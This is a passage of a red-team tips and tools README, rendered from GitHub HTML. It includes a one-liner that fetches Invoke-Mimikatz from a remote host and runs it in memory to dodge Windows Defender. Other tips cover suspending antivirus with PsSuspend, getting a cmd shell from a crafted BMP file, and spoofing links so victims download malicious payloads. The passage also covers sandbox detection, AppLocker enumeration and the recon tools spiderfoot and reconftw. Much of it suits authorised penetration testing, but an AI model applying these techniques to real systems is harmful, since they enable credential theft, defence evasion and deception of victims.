0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="(new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv"><pre>(new-object net.webclient).downloadstring(<span class="pl-s"><span class="pl-pds">'</span>https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1<span class="pl-pds">'</span></span>)<span class="pl-k">|</span>IEX<span class="pl-k">;</span>inv</pre></div> <p dir="auto"><strong>Description:</strong> <em>'Are you tired of Windows Defender deleting mimikatz.exe? Try this instead.'</em></p> <p dir="auto"><strong>Credit:</strong> <a href="https://twitter.com/GuhnooPlusLinux" rel="nofollow">@GuhnooPlusLinux</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://twitter.com/GuhnooPlusLinux/status/1605629049660809216" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Check if you are in a virtual machine</h3><a id="user-content-check-if-you-are-in-a-virtual-machine" class="anchor" aria-label="Permalink: 🔙Check if you are in a virtual machine" href="#check-if-you-are-in-a-virtual-machine"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="reg query HKLM\SYSTEM /s | findstr /S "VirtualBox VBOX VMWare""><pre>reg query HKLM<span class="pl-cce">\S</span>YSTEM /s <span class="pl-k">|</span> findstr /S <span class="pl-s"><span class="pl-pds">"</span>VirtualBox VBOX VMWare<span class="pl-pds">"</span></span></pre></div> <p dir="auto"><strong>Description:</strong> <em>'Want to know if you are in a Virtual Machine? Query the registry Keys and find out!!! If any results show up then you are in a Virtual Machine.'</em></p> <p dir="auto"><strong>Credit:</strong> <a href="https://twitter.com/dmcxblue" rel="nofollow">@dmcxblue</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://twitter.com/dmcxblue/status/1366779034672136194" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Enumerate AppLocker rules</h3><a id="user-content-enumerate-applocker-rules" class="anchor" aria-label="Permalink: 🔙Enumerate AppLocker rules" href="#enumerate-applocker-rules"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="(Get-AppLockerPolicy -Local).RuleCollections Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\"><pre class="notranslate"><code>(Get-AppLockerPolicy -Local).RuleCollections Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\ </code></pre></div> <p dir="auto"><strong>Description:</strong> <em>'AppLocker can be a pain. Enumerate to see how painful'</em></p> <p dir="auto"><strong>Credit:</strong> <a href="https://twitter.com/Alh4zr3d" rel="nofollow">@Alh4zr3d</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://twitter.com/alh4zr3d/status/1614706476412698624" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>CMD shortcut with 6 pixels via mspaint</h3><a id="user-content-cmd-shortcut-with-6-pixels-via-mspaint" class="anchor" aria-label="Permalink: 🔙CMD shortcut with 6 pixels via mspaint" href="#cmd-shortcut-with-6-pixels-via-mspaint"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/223849011-24db49d7-37b0-4dad-a7a6-db046f6cb7da.png"><img src="https://user-images.githubusercontent.com/100603074/223849011-24db49d7-37b0-4dad-a7a6-db046f6cb7da.png" alt="image" style="max-width: 100%;"></a></p> <ol dir="auto"> <li>Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels</li> <li>Zoom in to make the following tasks easier</li> <li>Using the colour picker, set pixels values to (from left to right): <ul dir="auto"> <li>1st: R: 10, G: 0, B: 0</li> <li>2nd: R: 13, G: 10, B: 13</li> <li>3rd: R: 100, G: 109, B: 99</li> <li>4th: R: 120, G: 101, B: 46</li> <li>5th: R: 0, G: 0, B: 101</li> <li>6th: R: 0, G: 0, B: 0</li> </ul> </li> <li>Save it as 24-bit Bitmap (<em>.bmp;</em>.dib)</li> <li>Change its extension from bmp to bat and run.</li> </ol> <p dir="auto"><strong>Description:</strong> <em>'An unusual, yet effective method of gaining a shell by creating a shortcut to cmd.exe by drawing certain colours in Microsoft Paint. Due to the encoding algorithm used to write BMP files, it is possible to dictate ASCII data written into a file by carefully selecting certain RGB colours.'</em></p> <p dir="auto"><strong>Credit:</strong> <a href="https://www.pentestpartners.com/" rel="nofollow">PenTestPartners</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/#gainingacommandshell" rel="nofollow">Blog</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Link spoofing with PreventDefault JavaScript method</h3><a id="user-content-link-spoofing-with-preventdefault-javascript-method" class="anchor" aria-label="Permalink: 🔙Link spoofing with PreventDefault JavaScript method" href="#link-spoofing-with-preventdefault-javascript-method"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/223849419-c65fec83-ca1c-4a20-ac06-ec2de537a748.png"><img src="https://user-images.githubusercontent.com/100603074/223849419-c65fec83-ca1c-4a20-ac06-ec2de537a748.png" alt="image" style="max-width: 100%;"></a></p> <div class="highlight highlight-text-html-basic notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>PreventDefault Example</title> </head> <body> <a href="https://google.com" onclick="event.preventDefault(); window.location.href = 'https://bing.com';">Go to Google</a> </body> </html>"><pre><span class="pl-c1"><!DOCTYPE html<span class="pl-kos">></span></span> <span class="pl-kos"><</span><span class="pl-ent">html</span><span class="pl-kos">></span> <span class="pl-kos"><</span><span class="pl-ent">head</span><span class="pl-kos">></span> <span class="pl-kos"><</span><span class="pl-ent">meta</span> <span class="pl-c1">charset</span>="<span class="pl-s">UTF-8</span>"<span class="pl-kos">></span> <span class="pl-kos"><</span><span class="pl-ent">title</span><span class="pl-kos">></span>PreventDefault Example<span class="pl-kos"></</span><span class="pl-ent">title</span><span class="pl-kos">></span> <span class="pl-kos"></</span><span class="pl-ent">head</span><span class="pl-kos">></span> <span class="pl-kos"><</span><span class="pl-ent">body</span><span class="pl-kos">></span> <span class="pl-kos"><</span><span class="pl-ent">a</span> <span class="pl-c1">href</span>="<span class="pl-s">https://google.com</span>" <span class="pl-c1">onclick</span>="<span class="pl-s">event.preventDefault(); window.location.href = 'https://bing.com';</span>"<span class="pl-kos">></span>Go to Google<span class="pl-kos"></</span><span class="pl-ent">a</span><span class="pl-kos">></span> <span class="pl-kos"></</span><span class="pl-ent">body</span><span class="pl-kos">></span> <span class="pl-kos"></</span><span class="pl-ent">html</span><span class="pl-kos">></span></pre></div> <p dir="auto"><strong>Description:</strong> <em>Threat actors have been observed using this technique to trick victims into clicking spoofed in-page malware download links. Using the PreventDefault JavaScript method you can spoof the hover link to display a legit link <code>google.com</code>, but once clicked the victim will be redirected to your malicious link <code>bing.com</code>. Great for getting victims to download payloads via a controlled site.</em></p> <p dir="auto"><strong>Link:</strong> <a href="https://developer.mozilla.org/en-US/docs/Web/API/Event/preventDefault" rel="nofollow">PreventDefault Docs</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Check SMB firewall rules with Responder</h3><a id="user-content-check-smb-firewall-rules-with-responder" class="anchor" aria-label="Permalink: 🔙Check SMB firewall rules with Responder" href="#check-smb-firewall-rules-with-responder"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/229650380-b651cfc4-896f-4429-b7b4-54d1241a5b39.png"><img src="https://user-images.githubusercontent.com/100603074/229650380-b651cfc4-896f-4429-b7b4-54d1241a5b39.png" alt="image" style="max-width: 100%;"></a></p> <div class="highlight highlight-source-powershell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="Copy-Item -Path "C:\tmp\" -Destination "\\<ip_running_responder>\c$""><pre><span class="pl-c1">Copy-Item</span> <span class="pl-k">-</span>Path <span class="pl-s"><span class="pl-pds">"</span>C:\tmp\<span class="pl-pds">"</span></span> <span class="pl-k">-</span>Destination <span class="pl-s"><span class="pl-pds">"</span>\\<ip_running_responder>\c$<span class="pl-pds">"</span></span></pre></div> <p dir="auto"><strong>Description:</strong> <em>'When I do a Compromise Assessment, I often ask the customer if I can do a last quick check: <code>Copy-Item -Path "C:\tmp\" -Destination "\\<ip_running_responder>\c$"</code>. If Responder could capture the hash, the firewall allows outgoing SMB connections'</em></p> <p dir="auto"><strong>Credit:</strong> <a href="https://twitter.com/malmoeb" rel="nofollow">@malmoeb</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://twitter.com/malmoeb/status/1628272928855826433" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Disable AV with SysInternals PsSuspend</h3><a id="user-content-disable-av-with-sysinternals-pssuspend" class="anchor" aria-label="Permalink: 🔙Disable AV with SysInternals PsSuspend" href="#disable-av-with-sysinternals-pssuspend"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer" href="https://private-user-images.githubusercontent.com/100603074/238468403-4519f5ad-c177-4550-b9af-238fa73ad66e.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4NDAzLTQ1MTlmNWFkLWMxNzctNDU1MC1iOWFmLTIzOGZhNzNhZDY2ZS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT03MTI5N2QxZGYwY2VhNjNlNzAwZTgzYjI1MzE2MzY5ODc3OWVjZjVlOTU4NmMxYWI1NjIzNzVmMTYxMGY3MWEyJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.hqYRc3EoxgaMMv4MaaqzB1S-PLT9acQhpp7EWXMYDuY"><img src="https://private-user-images.githubusercontent.com/100603074/238468403-4519f5ad-c177-4550-b9af-238fa73ad66e.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4NDAzLTQ1MTlmNWFkLWMxNzctNDU1MC1iOWFmLTIzOGZhNzNhZDY2ZS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT03MTI5N2QxZGYwY2VhNjNlNzAwZTgzYjI1MzE2MzY5ODc3OWVjZjVlOTU4NmMxYWI1NjIzNzVmMTYxMGY3MWEyJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.hqYRc3EoxgaMMv4MaaqzB1S-PLT9acQhpp7EWXMYDuY" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><strong>Description:</strong> <em>Using the Microsoft Sysinternals tool PsSuspend.exe it's possible to suspend some AV service executables. The Microsoft signed tool can be passed the PID or Name of a running service, it will suspend the process via the NtSuspendProcess Windows API.</em></p> <p dir="auto"><strong>Related Blog Post:</strong> <a href="https://medium.com/@a-poc/process-suspension-with-pssuspend-exe-0cdf5d16a3b7" rel="nofollow">Bypassing AV via Process Suspension with PsSuspend.exe</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://twitter.com/0gtweet/status/1638069413717975046" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Reconnaissance</h1><a id="user-content-reconnaissance" class="anchor" aria-label="Permalink: Reconnaissance" href="#reconnaissance"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/smicallef/spiderfoot">spiderfoot</a></h3><a id="user-content-spiderfoot" class="anchor" aria-label="Permalink: 🔙spiderfoot" href="#spiderfoot"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">SpiderFoot is an open source intelligence (OSINT) automation tool. It integrates with just about every data source available and utilises a range of methods for data analysis, making that data easy to navigate.</p> <p dir="auto">SpiderFoot can be used offensively (e.g. in a red team exercise or penetration test) for reconnaissance of your target or defensively to gather information about what you or your organisation might have exposed over the Internet.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="wget https://github.com/smicallef/spiderfoot/archive/v4.0.tar.gz tar zxvf v4.0.tar.gz cd spiderfoot-4.0 pip3 install -r requirements.txt"><pre>wget https://github.com/smicallef/spiderfoot/archive/v4.0.tar.gz tar zxvf v4.0.tar.gz <span class="pl-c1">cd</span> spiderfoot-4.0 pip3 install -r requirements.txt</pre></div> <p dir="auto">For full installation instructions see <a href="https://github.com/smicallef/spiderfoot?tab=readme-ov-file#installing--running">here</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="python3 ./sf.py -l 127.0.0.1:5001"><pre><span class="pl-s1">python3</span> .<span class="pl-c1">/</span><span class="pl-c1">sf</span>.<span class="pl-c1">py</span> <span class="pl-c1">-</span><span class="pl-s1">l</span> <span class="pl-c1">127.0</span><span class="pl-c1">.0</span>.<span class="pl-c1">1</span>:<span class="pl-c1">5001</span></pre></div> <p dir="auto">Lots of usage tutorial videos <a href="https://asciinema.org/~spiderfoot" rel="nofollow">here</a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer" href="https://private-user-images.githubusercontent.com/100603074/423172581-1ce26a9e-6fa5-4987-9aea-4943b9c2efec.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTgxLTFjZTI2YTllLTZmYTUtNDk4Ny05YWVhLTQ5NDNiOWMyZWZlYy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT00MjM1MWI2NzMyODY2NWQyNTlkYjdiMGEyNDc2ODY2NTE4MzZiNTc1NDZmNjgwZTc2YzRkMDJjOGM3NzkxOWVkJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.RbjvoDKsExF0pa4GHnMjkgDv6pqYJrYZ2cfe9Z0y6nY"><img src="https://private-user-images.githubusercontent.com/100603074/423172581-1ce26a9e-6fa5-4987-9aea-4943b9c2efec.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNTgxLTFjZTI2YTllLTZmYTUtNDk4Ny05YWVhLTQ5NDNiOWMyZWZlYy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT00MjM1MWI2NzMyODY2NWQyNTlkYjdiMGEyNDc2ODY2NTE4MzZiNTc1NDZmNjgwZTc2YzRkMDJjOGM3NzkxOWVkJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.RbjvoDKsExF0pa4GHnMjkgDv6pqYJrYZ2cfe9Z0y6nY" alt="spiderfoot" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/smicallef/spiderfoot">https://github.com/smicallef/spiderfoot</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/six2dez/reconftw">reconftw</a></h3><a id="user-content-reconftw" class="anchor" aria-label="Permalink: 🔙reconftw" href="#reconftw"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">reconFTW automates the entire process of reconnaissance for you. It outperforms the work of subdomain enumeration along with various vulnerability checks and obtaining maximum information about your target.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/six2dez/reconftw.git;cd reconftw/;./install.sh"><pre>git clone https://github.com/six2dez/reconftw.git<span class="pl-k">;</span><span class="pl-c1">cd</span> reconftw/<span class="pl-k">;</span>./install.sh</pre></div> <p dir="auto">For full installation instructions see <a href="https://github.com/six2dez/reconftw/wiki/0.-Installation-Guide">here</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Single target domain ./reconftw.sh -d target.com -r # One target with multiple domains ./reconftw.sh -m target -l domains.txt -r # Passive recon ./reconftw.sh -d target.com -p # Perform all checks and exploitations ./reconftw.sh -d target.com -a"><pre><span class="pl-c"><span class="pl-c">#</span> Single target domain</span> ./reconftw.sh -d target.com -r <span class="pl-c"><span class="pl-c">#</span> One target with multiple domains</span> ./reconftw.sh -m target -l domains.txt -r <span class="pl-c"><span class="pl-c">#</span> Passive recon</span> ./reconftw.sh -d target.com -p <span class="pl-c"><span class="pl-c">#</span> Perform all checks and exploitations</span> ./reconftw.sh -d target.com -a</pre></div> <p dir="auto">For full usage instructions see <a href="https://github.com/six2dez/reconftw/wiki/2.-Usage-Guide">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer" 